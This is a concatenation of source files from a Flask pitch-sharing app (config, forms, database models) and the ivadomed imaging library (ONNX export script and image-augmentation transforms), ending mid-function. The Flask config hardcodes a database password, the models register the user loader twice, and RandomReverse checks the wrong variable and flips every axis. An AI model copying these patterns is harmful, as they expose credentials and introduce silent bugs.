import os
class Config:
SQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://carolyne:123@localhost/pitches'
SECRET_KEY = os.environ.get('SECRET_KEY')
SQLALCHEMY_TRACK_MODIFICATIONS = False
class DevConfig(Config):
DEBUG = True
class ProdConfig(Config):
SQLALCHEMY_DATABASE_URI = os.environ.get("DATABASE_URL")
if SQLALCHEMY_DATABASE_URI and SQLALCHEMY_DATABASE_URI.startswith("postgres://"):
SQLALCHEMY_DATABASE_URI = SQLALCHEMY_DATABASE_URI.replace("postgres://", "postgresql://", 1)
pass
config_options= {
'development': DevConfig,
'production': ProdConfig
}
|
mamu234/one-minute-pitch | app/main/forms.py | from flask_wtf import FlaskForm
from wtforms import StringField,PasswordField,SubmitField, TextAreaField, SelectField
from wtforms.validators import InputRequired,Email,EqualTo
from ..models import Users
class UpdateProfile(FlaskForm):
bio = TextAreaField('Tell us about yourself:',validators = [InputRequired()])
submit = SubmitField('Submit')
class PitchForm(FlaskForm):
title = StringField('Title', validators=[InputRequired()])
category = SelectField('Category', choices=[('Events','Events'),('Job','Job'),('Advertisement','Advertisement')],validators=[InputRequired()])
post = TextAreaField('Your Pitch', validators=[InputRequired()])
submit = SubmitField('Pitch')
class CommentForm(FlaskForm):
comment = TextAreaField('Leave a comment',validators=[InputRequired()])
submit = SubmitField('Comment') |
mamu234/one-minute-pitch | app/models.py | from . import db,login_manager
from werkzeug.security import generate_password_hash,check_password_hash
from flask_login import UserMixin, current_user
from datetime import datetime
@login_manager.user_loader
def load_user(user_id):
return Users.query.get(int(user_id))
class Users(UserMixin,db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer,primary_key = True)
username = db.Column(db.String(255),unique = True, nullable = False)
email = db.Column(db.String(255),unique = True, nullable = False)
pass_safe = db.Column(db.String(255), nullable = False)
bio = db.Column(db.String(255))
prof_pic_path = db.Column(db.String())
role_id = db.Column(db.Integer,db.ForeignKey('roles.id'))
pitches = db.relationship('Pitches', backref='user', lazy='dynamic')
comments = db.relationship('Comment', backref='user', lazy='dynamic')
upvotes = db.relationship('Upvote', backref='user', lazy='dynamic')
downvotes = db.relationship('Downvote', backref='user', lazy='dynamic')
@property
def password(self):
raise AttributeError('You cannot read the password attribute')
@password.setter
def password(self, password):
self.pass_safe = generate_password_hash(password)
def verify_password(self,password):
return check_password_hash(self.pass_safe,password)
def user_save(self):
db.session.add(self)
db.session.commit()
def user_delete(self):
db.session.delete(self)
db.session.commit()
def __repr__(self):
return f'User {self.username}'
class Pitches(db.Model):
__tablename__ = 'pitches'
id = db.Column(db.Integer, primary_key = True)
pitchtitle = db.Column(db.String(255),nullable = False)
post = db.Column(db.String(255),nullable = False)
comments = db.relationship('Comment', backref='pitch', lazy='dynamic')
upvote = db.relationship('Upvote',backref='pitch',lazy='dynamic')
downvote = db.relationship('Downvote',backref='pitch',lazy='dynamic')
user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
time = db.Column(db.DateTime, default = datetime.utcnow)
category = db.Column(db.String(255), index = True,nullable = False)
def pitch_save(self):
db.session.add(self)
db.session.commit()
def pitch_delete(self):
db.session.delete(self)
db.session.commit()
def __repr__(self):
return f'User {self.pitch}'
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer,primary_key = True)
name = db.Column(db.String(255))
users = db.relationship('Users',backref = 'role',lazy="dynamic")
def __repr__(self):
return f'User {self.name}'
class Comment(db.Model):
__tablename__ = 'comments'
id = db.Column(db.Integer, primary_key=True)
comment = db.Column(db.Text(),nullable = False)
user_id = db.Column(db.Integer,db.ForeignKey('users.id'),nullable = False)
pitch_id = db.Column(db.Integer,db.ForeignKey('pitches.id'),nullable = False)
def save_c(self):
db.session.add(self)
db.session.commit()
@classmethod
def get_comments(cls,pitch_id):
comments = Comment.query.filter_by(pitch_id=pitch_id).all()
return comments
def __repr__(self):
return f'comment:{self.comment}'
class Upvote(db.Model):
__tablename__ = 'upvotes'
id = db.Column(db.Integer,primary_key=True)
user_id = db.Column(db.Integer,db.ForeignKey('users.id'))
pitch_id = db.Column(db.Integer,db.ForeignKey('pitches.id'))
def save(self):
db.session.add(self)
db.session.commit()
@classmethod
def get_upvotes(cls,id):
upvote = Upvote.query.filter_by(pitch_id=id).all()
return upvote
def __repr__(self):
return f'{self.user_id}:{self.pitch_id}'
class Downvote(db.Model):
__tablename__ = 'downvotes'
id = db.Column(db.Integer,primary_key=True)
user_id = db.Column(db.Integer,db.ForeignKey('users.id'))
pitch_id = db.Column(db.Integer,db.ForeignKey('pitches.id'))
def save(self):
db.session.add(self)
db.session.commit()
@classmethod
def get_downvotes(cls,id):
downvote = Downvote.query.filter_by(pitch_id=id).all()
return downvote
def __repr__(self):
return f'{self.user_id}:{self.pitch_id}'
@login_manager.user_loader
def load_user(user_id):
return Users.query.get(user_id)
|
nekohayo/ivadomed | ivadomed/scripts/convert_to_onnx.py | import argparse
import torch
from ivadomed import utils as imed_utils
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument("-m", "--model", dest="model", required=True, type=str, help="Path to .pt model.")
parser.add_argument("-d", "--dimension", dest="dimension", required=True,
type=int, help="Input dimension (2 for 2D inputs, 3 for 3D inputs).")
parser.add_argument("-n", "--n_channels", dest="n_channels", default=1, type=int,
help="Number of input channels of the model.")
parser.add_argument("-g", "--gpu", dest="gpu", default=0, type=str, help="GPU number if available.")
return parser
def convert_pytorch_to_onnx(model, dimension, n_channels, gpu=0):
"""Convert PyTorch model to ONNX.
The integration of Deep Learning models into the clinical routine requires cpu optimized models. To export the
PyTorch models to `ONNX <https://github.com/onnx/onnx>`_ format and to run the inference using
`ONNX Runtime <https://github.com/microsoft/onnxruntime>`_ is a time and memory efficient way to answer this need.
This function converts a model from PyTorch to ONNX format, with information of whether it is a 2D or 3D model
(``-d``).
Args:
model (string): Model filename. Flag: ``--model``, ``-m``.
dimension (int): Indicates whether the model is 2D or 3D. Choice between 2 or 3. Flag: ``--dimension``, ``-d``
gpu (string): GPU ID, if available. Flag: ``--gpu``, ``-g``
"""
if torch.cuda.is_available():
device = "cuda:" + str(gpu)
else:
device = "cpu"
model_net = torch.load(model, map_location=device)
dummy_input = torch.randn(1, n_channels, 96, 96, device=device) if dimension == 2 \
else torch.randn(1, n_channels, 96, 96, 96, device=device)
imed_utils.save_onnx_model(model_net, dummy_input, model.replace("pt", "onnx"))
def main():
imed_utils.init_ivadomed()
parser = get_parser()
args = parser.parse_args()
fname_model = args.model
dimension = int(args.dimension)
gpu = str(args.gpu)
n_channels = args.n_channels
# Run Script
convert_pytorch_to_onnx(fname_model, dimension, n_channels, gpu)
if __name__ == '__main__':
main()
|
nekohayo/ivadomed | ivadomed/transforms.py | <reponame>nekohayo/ivadomed
import copy
import functools
import math
import numbers
import random
import numpy as np
import torch
from scipy.ndimage import zoom
from scipy.ndimage.filters import gaussian_filter
from scipy.ndimage.interpolation import map_coordinates, affine_transform
from scipy.ndimage.measurements import label, center_of_mass
from scipy.ndimage.morphology import binary_dilation, binary_fill_holes, binary_closing
from skimage.exposure import equalize_adapthist
from torchvision import transforms as torchvision_transforms
from ivadomed.loader import utils as imed_loader_utils
def multichannel_capable(wrapped):
"""Decorator to make a given function compatible multichannel images.
Args:
wrapped: Given function.
Returns:
Functions' return.
"""
@functools.wraps(wrapped)
def wrapper(self, sample, metadata):
if isinstance(sample, list):
list_data, list_metadata = [], []
for s_cur, m_cur in zip(sample, metadata):
if len(list_metadata) > 0:
if not isinstance(list_metadata[-1], list):
imed_loader_utils.update_metadata([list_metadata[-1]], [m_cur])
else:
imed_loader_utils.update_metadata(list_metadata[-1], [m_cur])
# Run function for each sample of the list
data_cur, metadata_cur = wrapped(self, s_cur, m_cur)
list_data.append(data_cur)
list_metadata.append(metadata_cur)
return list_data, list_metadata
# If sample is None, then return a pair (None, None)
if sample is None:
return None, None
else:
return wrapped(self, sample, metadata)
return wrapper
def two_dim_compatible(wrapped):
"""Decorator to make a given function compatible 2D or 3D images.
Args:
wrapped: Given function.
Returns:
Functions' return.
"""
@functools.wraps(wrapped)
def wrapper(self, sample, metadata):
# Check if sample is 2D
if len(sample.shape) == 2:
# Add one dimension
sample = np.expand_dims(sample, axis=-1)
# Run transform
result_sample, result_metadata = wrapped(self, sample, metadata)
# Remove last dimension
return np.squeeze(result_sample, axis=-1), result_metadata
else:
return wrapped(self, sample, metadata)
return wrapper
class ImedTransform(object):
"""Base class for transforamtions."""
def __call__(self, sample, metadata=None):
raise NotImplementedError("You need to implement the transform() method.")
class Compose(object):
"""Composes transforms together.
Composes transforms together and split between images, GT and ROI.
self.transform is a dict:
- keys: "im", "gt" and "roi"
- values torchvision_transform.Compose objects.
Attributes:
dict_transforms (dict): Dictionary where the keys are the transform names
and the value their parameters.
requires_undo (bool): If True, does not include transforms which do not have an undo_transform
implemented yet.
Args:
transform (dict): Keys are "im", "gt", "roi" and values are torchvision_transforms.Compose of the
transformations of interest.
"""
def __init__(self, dict_transforms, requires_undo=False):
list_tr_im, list_tr_gt, list_tr_roi = [], [], []
for transform in dict_transforms.keys():
parameters = dict_transforms[transform]
# Get list of data type
if "applied_to" in parameters:
list_applied_to = parameters["applied_to"]
else:
list_applied_to = ["im", "gt", "roi"]
# call transform
if transform in globals():
params_cur = {k: parameters[k] for k in parameters if k != "applied_to" and k != "preprocessing"}
transform_obj = globals()[transform](**params_cur)
else:
raise ValueError('ERROR: {} transform is not available. '
'Please check its compatibility with your model json file.'.format(transform))
# check if undo_transform method is implemented
if requires_undo:
if not hasattr(transform_obj, 'undo_transform'):
print('{} transform not included since no undo_transform available for it.'.format(transform))
continue
if "im" in list_applied_to:
list_tr_im.append(transform_obj)
if "roi" in list_applied_to:
list_tr_roi.append(transform_obj)
if "gt" in list_applied_to:
list_tr_gt.append(transform_obj)
self.transform = {
"im": torchvision_transforms.Compose(list_tr_im),
"gt": torchvision_transforms.Compose(list_tr_gt),
"roi": torchvision_transforms.Compose(list_tr_roi)}
def __call__(self, sample, metadata, data_type='im'):
if self.transform[data_type] is None or len(metadata) == 0:
# In case self.transform[data_type] is None
return None, None
else:
for tr in self.transform[data_type].transforms:
sample, metadata = tr(sample, metadata)
return sample, metadata
class UndoCompose(object):
"""Undo the Compose transformations.
Call the undo transformations in the inverse order than the "do transformations".
Attributes:
compose (torchvision_transforms.Compose):
Args:
transforms (torchvision_transforms.Compose):
"""
def __init__(self, compose):
self.transforms = compose
def __call__(self, sample, metadata, data_type='gt'):
if self.transforms.transform[data_type] is None:
# In case self.transforms.transform[data_type] is None
return None, None
else:
for tr in self.transforms.transform[data_type].transforms[::-1]:
sample, metadata = tr.undo_transform(sample, metadata)
return sample, metadata
class UndoTransform(object):
"""Call undo transformation.
Attributes:
transform (ImedTransform):
Args:
transform (ImedTransform):
"""
def __init__(self, transform):
self.transform = transform
def __call__(self, sample):
return self.transform.undo_transform(sample)
class NumpyToTensor(ImedTransform):
"""Converts nd array to tensor object."""
def undo_transform(self, sample, metadata=None):
"""Converts Tensor to nd array."""
return list(sample.numpy()), metadata
def __call__(self, sample, metadata=None):
"""Converts nd array to Tensor."""
sample = np.array(sample)
# Use np.ascontiguousarray to avoid axes permutations issues
arr_contig = np.ascontiguousarray(sample, dtype=sample.dtype)
return torch.from_numpy(arr_contig), metadata
class Resample(ImedTransform):
"""
Resample image to a given resolution.
Args:
hspace (float): Resolution along the first axis, in mm.
wspace (float): Resolution along the second axis, in mm.
dspace (float): Resolution along the third axis, in mm.
interpolation_order (int): Order of spline interpolation. Set to 0 for label data. Default=2.
"""
def __init__(self, hspace, wspace, dspace=1.):
self.hspace = hspace
self.wspace = wspace
self.dspace = dspace
@multichannel_capable
@two_dim_compatible
def undo_transform(self, sample, metadata=None):
"""Resample to original resolution."""
assert "data_shape" in metadata
is_2d = sample.shape[-1] == 1
# Get params
original_shape = metadata["preresample_shape"]
current_shape = sample.shape
params_undo = [x / y for x, y in zip(original_shape, current_shape)]
if is_2d:
params_undo[-1] = 1.0
# Undo resampling
data_out = zoom(sample,
zoom=params_undo,
order=1 if metadata['data_type'] == 'gt' else 2)
# Data type
data_out = data_out.astype(sample.dtype)
return data_out, metadata
@multichannel_capable
@multichannel_capable # for multiple raters during training/preprocessing
@two_dim_compatible
def __call__(self, sample, metadata=None):
"""Resample to a given resolution, in millimeters."""
# Get params
# Voxel dimension in mm
is_2d = sample.shape[-1] == 1
metadata['preresample_shape'] = sample.shape
zooms = list(metadata["zooms"])
if len(zooms) == 2:
zooms += [1.0]
hfactor = zooms[0] / self.hspace
wfactor = zooms[1] / self.wspace
dfactor = zooms[2] / self.dspace
params_resample = (hfactor, wfactor, dfactor) if not is_2d else (hfactor, wfactor, 1.0)
# Run resampling
data_out = zoom(sample,
zoom=params_resample,
order=1 if metadata['data_type'] == 'gt' else 2)
# Data type
data_out = data_out.astype(sample.dtype)
return data_out, metadata
class NormalizeInstance(ImedTransform):
"""Normalize a tensor or an array image with mean and standard deviation estimated from the sample itself."""
@multichannel_capable
def undo_transform(self, sample, metadata=None):
# Nothing
return sample, metadata
@multichannel_capable
def __call__(self, sample, metadata=None):
data_out = (sample - sample.mean()) / sample.std()
return data_out, metadata
class CroppableArray(np.ndarray):
"""Zero padding slice past end of array in numpy.
Adapted From: https://stackoverflow.com/a/41155020/13306686
"""
def __getitem__(self, item):
all_in_slices = []
pad = []
for dim in range(self.ndim):
# If the slice has no length then it's a single argument.
# If it's just an integer then we just return, this is
# needed for the representation to work properly
# If it's not then create a list containing None-slices
# for dim>=1 and continue down the loop
try:
len(item)
except TypeError:
if isinstance(item, int):
return super().__getitem__(item)
newitem = [slice(None)] * self.ndim
newitem[0] = item
item = newitem
# We're out of items, just append noop slices
if dim >= len(item):
all_in_slices.append(slice(0, self.shape[dim]))
pad.append((0, 0))
# We're dealing with an integer (no padding even if it's
# out of bounds)
if isinstance(item[dim], int):
all_in_slices.append(slice(item[dim], item[dim] + 1))
pad.append((0, 0))
# Dealing with a slice, here it get's complicated, we need
# to correctly deal with None start/stop as well as with
# out-of-bound values and correct padding
elif isinstance(item[dim], slice):
# Placeholders for values
start, stop = 0, self.shape[dim]
this_pad = [0, 0]
if item[dim].start is None:
start = 0
else:
if item[dim].start < 0:
this_pad[0] = -item[dim].start
start = 0
else:
start = item[dim].start
if item[dim].stop is None:
stop = self.shape[dim]
else:
if item[dim].stop > self.shape[dim]:
this_pad[1] = item[dim].stop - self.shape[dim]
stop = self.shape[dim]
else:
stop = item[dim].stop
all_in_slices.append(slice(start, stop))
pad.append(tuple(this_pad))
# Let numpy deal with slicing
ret = super().__getitem__(tuple(all_in_slices))
# and padding
ret = np.pad(ret, tuple(pad), mode='constant', constant_values=0)
return ret
class Crop(ImedTransform):
"""Crop data.
Args:
size (tuple of int): Size of the output sample. Tuple of size 2 if dealing with 2D samples, 3 with 3D samples.
Attributes:
size (tuple of int): Size of the output sample. Tuple of size 3.
"""
def __init__(self, size):
self.size = size if len(size) == 3 else size + [0]
@staticmethod
def _adjust_padding(npad, sample):
npad_out_tuple = []
for idx_dim, tuple_pad in enumerate(npad):
pad_start, pad_end = tuple_pad
if pad_start < 0 or pad_end < 0:
# Move axis of interest
sample_reorient = np.swapaxes(sample, 0, idx_dim)
# Adjust pad and crop
if pad_start < 0 and pad_end < 0:
sample_crop = sample_reorient[abs(pad_start):pad_end, ]
pad_end, pad_start = 0, 0
elif pad_start < 0:
sample_crop = sample_reorient[abs(pad_start):, ]
pad_start = 0
else: # i.e. pad_end < 0:
sample_crop = sample_reorient[:pad_end, ]
pad_end = 0
# Reorient
sample = np.swapaxes(sample_crop, 0, idx_dim)
npad_out_tuple.append((pad_start, pad_end))
return npad_out_tuple, sample
@multichannel_capable
@multichannel_capable # for multiple raters during training/preprocessing
def __call__(self, sample, metadata):
# Get params
is_2d = sample.shape[-1] == 1
th, tw, td = self.size
fh, fw, fd, h, w, d = metadata['crop_params'][self.__class__.__name__]
# Crop data
# Note we use here CroppableArray in order to deal with "out of boundaries" crop
# e.g. if fh is negative or fh+th out of bounds, then it will pad
if is_2d:
data_out = sample.view(CroppableArray)[fh:fh + th, fw:fw + tw, :]
else:
data_out = sample.view(CroppableArray)[fh:fh + th, fw:fw + tw, fd:fd + td]
return data_out, metadata
@multichannel_capable
@two_dim_compatible
def undo_transform(self, sample, metadata=None):
# Get crop params
is_2d = sample.shape[-1] == 1
th, tw, td = self.size
fh, fw, fd, h, w, d = metadata["crop_params"][self.__class__.__name__]
# Compute params to undo transform
pad_left = fw
pad_right = w - pad_left - tw
pad_top = fh
pad_bottom = h - pad_top - th
pad_front = fd if not is_2d else 0
pad_back = d - pad_front - td if not is_2d else 0
npad = [(pad_top, pad_bottom), (pad_left, pad_right), (pad_front, pad_back)]
# Check and adjust npad if needed, i.e. if crop out of boundaries
npad_adj, sample_adj = self._adjust_padding(npad, sample.copy())
# Apply padding
data_out = np.pad(sample_adj,
npad_adj,
mode='constant',
constant_values=0).astype(sample.dtype)
return data_out, metadata
class CenterCrop(Crop):
"""Make a centered crop of a specified size."""
@multichannel_capable
@multichannel_capable # for multiple raters during training/preprocessing
@two_dim_compatible
def __call__(self, sample, metadata=None):
# Crop parameters
th, tw, td = self.size
h, w, d = sample.shape
fh = int(round((h - th) / 2.))
fw = int(round((w - tw) / 2.))
fd = int(round((d - td) / 2.))
params = (fh, fw, fd, h, w, d)
metadata['crop_params'][self.__class__.__name__] = params
# Call base method
return super().__call__(sample, metadata)
class ROICrop(Crop):
"""Make a crop of a specified size around a Region of Interest (ROI)."""
@multichannel_capable
@multichannel_capable # for multiple raters during training/preprocessing
@two_dim_compatible
def __call__(self, sample, metadata=None):
# If crop_params are not in metadata,
# then we are here dealing with ROI data to determine crop params
if self.__class__.__name__ not in metadata['crop_params']:
# Compute center of mass of the ROI
h_roi, w_roi, d_roi = center_of_mass(sample.astype(np.int))
h_roi, w_roi, d_roi = int(round(h_roi)), int(round(w_roi)), int(round(d_roi))
th, tw, td = self.size
th_half, tw_half, td_half = int(round(th / 2.)), int(round(tw / 2.)), int(round(td / 2.))
# compute top left corner of the crop area
fh = h_roi - th_half
fw = w_roi - tw_half
fd = d_roi - td_half
# Crop params
h, w, d = sample.shape
params = (fh, fw, fd, h, w, d)
metadata['crop_params'][self.__class__.__name__] = params
# Call base method
return super().__call__(sample, metadata)
class DilateGT(ImedTransform):
"""Randomly dilate a ground-truth tensor.
.. image:: ../../images/dilate-gt.png
:width: 600px
:align: center
Args:
dilation_factor (float): Controls the number of dilation iterations. For each individual lesion, the number of
dilation iterations is computed as follows:
nb_it = int(round(dilation_factor * sqrt(lesion_area)))
If dilation_factor <= 0, then no dilation will be performed.
"""
def __init__(self, dilation_factor):
self.dil_factor = dilation_factor
@staticmethod
def dilate_lesion(arr_bin, arr_soft, label_values):
for lb in label_values:
# binary dilation with 1 iteration
arr_dilated = binary_dilation(arr_bin, iterations=1)
# isolate new voxels, i.e. the ones from the dilation
new_voxels = np.logical_xor(arr_dilated, arr_bin).astype(np.int)
# assign a soft value (]0, 1[) to the new voxels
soft_new_voxels = lb * new_voxels
# add the new voxels to the input mask
arr_soft += soft_new_voxels
arr_bin = (arr_soft > 0).astype(np.int)
return arr_bin, arr_soft
def dilate_arr(self, arr, dil_factor):
# identify each object
arr_labeled, lb_nb = label(arr.astype(np.int))
# loop across each object
arr_bin_lst, arr_soft_lst = [], []
for obj_idx in range(1, lb_nb + 1):
arr_bin_obj = (arr_labeled == obj_idx).astype(np.int)
arr_soft_obj = np.copy(arr_bin_obj).astype(np.float)
# compute the number of dilation iterations depending on the size of the lesion
nb_it = int(round(dil_factor * math.sqrt(arr_bin_obj.sum())))
# values of the voxels added to the input mask
soft_label_values = [x / (nb_it + 1) for x in range(nb_it, 0, -1)]
# dilate lesion
arr_bin_dil, arr_soft_dil = self.dilate_lesion(arr_bin_obj, arr_soft_obj, soft_label_values)
arr_bin_lst.append(arr_bin_dil)
arr_soft_lst.append(arr_soft_dil)
# sum dilated objects
arr_bin_idx = np.sum(np.array(arr_bin_lst), axis=0)
arr_soft_idx = np.sum(np.array(arr_soft_lst), axis=0)
# clip values in case dilated voxels overlap
arr_bin_clip, arr_soft_clip = np.clip(arr_bin_idx, 0, 1), np.clip(arr_soft_idx, 0.0, 1.0)
return arr_soft_clip.astype(np.float), arr_bin_clip.astype(np.int)
@staticmethod
def random_holes(arr_in, arr_soft, arr_bin):
arr_soft_out = np.copy(arr_soft)
# coordinates of the new voxels, i.e. the ones from the dilation
new_voxels_xx, new_voxels_yy, new_voxels_zz = np.where(np.logical_xor(arr_bin, arr_in))
nb_new_voxels = new_voxels_xx.shape[0]
# ratio of voxels added to the input mask from the dilated mask
new_voxel_ratio = random.random()
# randomly select new voxel indexes to remove
idx_to_remove = random.sample(range(nb_new_voxels),
int(round(nb_new_voxels * (1 - new_voxel_ratio))))
# set to zero the here-above randomly selected new voxels
arr_soft_out[new_voxels_xx[idx_to_remove],
new_voxels_yy[idx_to_remove],
new_voxels_zz[idx_to_remove]] = 0.0
arr_bin_out = (arr_soft_out > 0).astype(np.int)
return arr_soft_out, arr_bin_out
@staticmethod
def post_processing(arr_in, arr_soft, arr_bin, arr_dil):
# remove new object that are not connected to the input mask
arr_labeled, lb_nb = label(arr_bin)
connected_to_in = arr_labeled * arr_in
for lb in range(1, lb_nb + 1):
if np.sum(connected_to_in == lb) == 0:
arr_soft[arr_labeled == lb] = 0
struct = np.ones((3, 3, 1) if arr_soft.shape[2] == 1 else (3, 3, 3))
# binary closing
arr_bin_closed = binary_closing((arr_soft > 0).astype(np.int), structure=struct)
# fill binary holes
arr_bin_filled = binary_fill_holes(arr_bin_closed)
# recover the soft-value assigned to the filled-holes
arr_soft_out = arr_bin_filled * arr_dil
return arr_soft_out
@multichannel_capable
@two_dim_compatible
def __call__(self, sample, metadata=None):
# binarize for processing
gt_data_np = (sample > 0.5).astype(np.int_)
if self.dil_factor > 0 and np.sum(sample):
# dilation
gt_dil, gt_dil_bin = self.dilate_arr(gt_data_np, self.dil_factor)
# random holes in dilated area
# gt_holes, gt_holes_bin = self.random_holes(gt_data_np, gt_dil, gt_dil_bin)
# post-processing
# gt_pp = self.post_processing(gt_data_np, gt_holes, gt_holes_bin, gt_dil)
# return gt_pp.astype(np.float32), metadata
return gt_dil.astype(np.float32), metadata
else:
return sample, metadata
class BoundingBoxCrop(Crop):
"""Crops image according to given bounding box."""
@multichannel_capable
@two_dim_compatible
def __call__(self, sample, metadata):
assert 'bounding_box' in metadata
x_min, x_max, y_min, y_max, z_min, z_max = metadata['bounding_box']
x, y, z = sample.shape
metadata['crop_params'][self.__class__.__name__] = (x_min, y_min, z_min, x, y, z)
# Call base method
return super().__call__(sample, metadata)
class RandomAffine(ImedTransform):
"""Apply Random Affine transformation.
Args:
degrees (float): Positive float or list (or tuple) of length two. Angles in degrees. If only a float is
provided, then rotation angle is selected within the range [-degrees, degrees]. Otherwise, the list / tuple
defines this range.
translate (list of float): List of floats between 0 and 1, of length 2 or 3 depending on the sample shape (2D
or 3D). These floats defines the maximum range of translation along each axis.
scale (list of float): List of floats between 0 and 1, of length 2 or 3 depending on the sample shape (2D
or 3D). These floats defines the maximum range of scaling along each axis.
Attributes:
degrees (tuple of floats):
translate (list of float):
scale (list of float):
"""
def __init__(self, degrees=0, translate=None, scale=None):
# Rotation
if isinstance(degrees, numbers.Number):
if degrees < 0:
raise ValueError("If degrees is a single number, it must be positive.")
self.degrees = (-degrees, degrees)
else:
assert isinstance(degrees, (tuple, list)) and len(degrees) == 2, \
"degrees should be a list or tuple and it must be of length 2."
self.degrees = degrees
# Scale
if scale is not None:
assert isinstance(scale, (tuple, list)) and (len(scale) == 2 or len(scale) == 3), \
"scale should be a list or tuple and it must be of length 2 or 3."
for s in scale:
if not (0.0 <= s <= 1.0):
raise ValueError("scale values should be between 0 and 1")
if len(scale) == 2:
scale.append(0.0)
self.scale = scale
else:
self.scale = [0., 0., 0.]
# Translation
if translate is not None:
assert isinstance(translate, (tuple, list)) and (len(translate) == 2 or len(translate) == 3), \
"translate should be a list or tuple and it must be of length 2 or 3."
for t in translate:
if not (0.0 <= t <= 1.0):
raise ValueError("translation values should be between 0 and 1")
if len(translate) == 2:
translate.append(0.0)
self.translate = translate
@multichannel_capable
@two_dim_compatible
def __call__(self, sample, metadata=None):
# Rotation
# If angle and metadata have been already defined for this sample, then use them
if 'rotation' in metadata:
angle, axes = metadata['rotation']
# Otherwise, get random ones
else:
# Get the random angle
angle = math.radians(np.random.uniform(self.degrees[0], self.degrees[1]))
# Get the two axes that define the plane of rotation
axes = list(random.sample(range(3 if sample.shape[2] > 1 else 2), 2))
axes.sort()
# Save params
metadata['rotation'] = [angle, axes]
# Scale
if "scale" in metadata:
scale_x, scale_y, scale_z = metadata['scale']
else:
scale_x = random.uniform(1 - self.scale[0], 1 + self.scale[0])
scale_y = random.uniform(1 - self.scale[1], 1 + self.scale[1])
scale_z = random.uniform(1 - self.scale[2], 1 + self.scale[2])
metadata['scale'] = [scale_x, scale_y, scale_z]
# Get params
if 'translation' in metadata:
translations = metadata['translation']
else:
self.data_shape = sample.shape
if self.translate is not None:
max_dx = self.translate[0] * self.data_shape[0]
max_dy = self.translate[1] * self.data_shape[1]
max_dz = self.translate[2] * self.data_shape[2]
translations = (np.round(np.random.uniform(-max_dx, max_dx)),
np.round(np.random.uniform(-max_dy, max_dy)),
np.round(np.random.uniform(-max_dz, max_dz)))
else:
translations = (0, 0, 0)
metadata['translation'] = translations
# Do rotation
shape = 0.5 * np.array(sample.shape)
if axes == [0, 1]:
rotate = np.array([[math.cos(angle), -math.sin(angle), 0],
[math.sin(angle), math.cos(angle), 0],
[0, 0, 1]])
elif axes == [0, 2]:
rotate = np.array([[math.cos(angle), 0, math.sin(angle)],
[0, 1, 0],
[-math.sin(angle), 0, math.cos(angle)]])
elif axes == [1, 2]:
rotate = np.array([[1, 0, 0],
[0, math.cos(angle), -math.sin(angle)],
[0, math.sin(angle), math.cos(angle)]])
else:
raise ValueError("Unknown axes value")
scale = np.array([[1 / scale_x, 0, 0], [0, 1 / scale_y, 0], [0, 0, 1 / scale_z]])
if "undo" in metadata and metadata["undo"]:
transforms = scale.dot(rotate)
else:
transforms = rotate.dot(scale)
offset = shape - shape.dot(transforms) + translations
data_out = affine_transform(sample, transforms.T, order=1, offset=offset,
output_shape=sample.shape).astype(sample.dtype)
return data_out, metadata
@multichannel_capable
@two_dim_compatible
def undo_transform(self, sample, metadata=None):
assert "rotation" in metadata
assert "scale" in metadata
assert "translation" in metadata
# Opposite rotation, same axes
angle, axes = - metadata['rotation'][0], metadata['rotation'][1]
scale = 1 / np.array(metadata['scale'])
translation = - np.array(metadata['translation'])
# Undo rotation
dict_params = {"rotation": [angle, axes], "scale": scale, "translation": [0, 0, 0], "undo": True}
data_out, _ = self.__call__(sample, dict_params)
data_out = affine_transform(data_out, np.identity(3), order=1, offset=translation,
output_shape=sample.shape).astype(sample.dtype)
return data_out, metadata
class RandomReverse(ImedTransform):
"""Make a randomized symmetric inversion of the different values of each dimensions."""
@multichannel_capable
@two_dim_compatible
def __call__(self, sample, metadata=None):
if 'reverse' in metadata:
flip_axes = metadata['reverse']
else:
# Flip axis booleans
flip_axes = [np.random.randint(2) == 1 for _ in [0, 1, 2]]
# Save in metadata
metadata['reverse'] = flip_axes
# Run flip
for idx_axis, flip_bool in enumerate(flip_axes):
if flip_axes:
sample = np.flip(sample, axis=idx_axis).copy()
return sample, metadata
@multichannel_capable
@two_dim_compatible
def undo_transform(self, sample, metadata=None):
assert "reverse" in metadata
return self.__call__(sample, metadata)
class RandomShiftIntensity(ImedTransform):
"""Add a random intensity offset.
Args:
shift_range (tuple of floats): Tuple of length two. Specifies the range where the offset that is applied is
randomly selected from.
prob (float): Between 0 and 1. Probability of occurence of this transformation.
"""
def __init__(self, shift_range, prob=0.1):
self.shift_range = shift_range
self.prob = prob
@multichannel_capable
def __call__(self, sample, metadata=None):
if np.random.random() < self.prob:
# Get random offset
offset = np.random.uniform(self.shift_range[0], self.shift_range[1])
else:
offset = 0.0
# Update metadata
metadata['offset'] = offset
# Shift intensity
data = (sample + offset).astype(sample.dtype)
return data, metadata
@multichannel_capable
def undo_transform(self, sample, metadata=None):
assert 'offset' in metadata
# Get offset
offset = metadata['offset']
# Substract offset
data = (sample - offset).astype(sample.dtype)
return data, metadata
class ElasticTransform(ImedTransform):
"""Applies elastic transformation.
.. seealso::
Simard, <NAME>., <NAME>, and <NAME>. "Best practices for convolutional neural networks
applied to visual document analysis." Icdar. Vol. 3. No. 2003. 2003.
Args:
alpha_range (tuple of floats): Deformation coefficient. Length equals 2.
sigma_range (tuple of floats): Standard deviation. Length equals 2.
"""
def __init__(self, alpha_range, sigma_range, p=0.1):
self.alpha_range = alpha_range
self.sigma_range = sigma_range
self.p = p
@multichannel_capable
@two_dim_compatible
def __call__(self, sample, metadata=None):
# if params already defined, i.e. sample is GT
if "elastic" in metadata:
alpha, sigma = metadata["elastic"]
elif np.random.random() < self.p:
# Get params
alpha = np.random.uniform(self.alpha_range[0], self.alpha_range[1])
sigma = np.random.uniform(self.sigma_range[0], self.sigma_range[1])
# Save params
metadata["elastic"] = [alpha, sigma]
else:
metadata["elastic"] = [None, None]
if any(metadata["elastic"]):
# Get shape
shape = sample.shape
# Compute random deformation
dx = gaussian_filter((np.random.rand(*shape) * 2 - 1),
sigma, mode="constant", cval=0) * alpha
dy = gaussian_filter((np.random.rand(*shape) * 2 - 1),
sigma, mode="constant", cval=0) * alpha
dz = gaussian_filter((np.random.rand(*shape) * 2 - 1),
sigma, mode="constant", cval=0) * alpha
if shape[2] == 1:
dz = 0 # No deformation along the last dimension
x, y, z = np.meshgrid(np.arange(shape[0]),
np.arange(shape[1]),
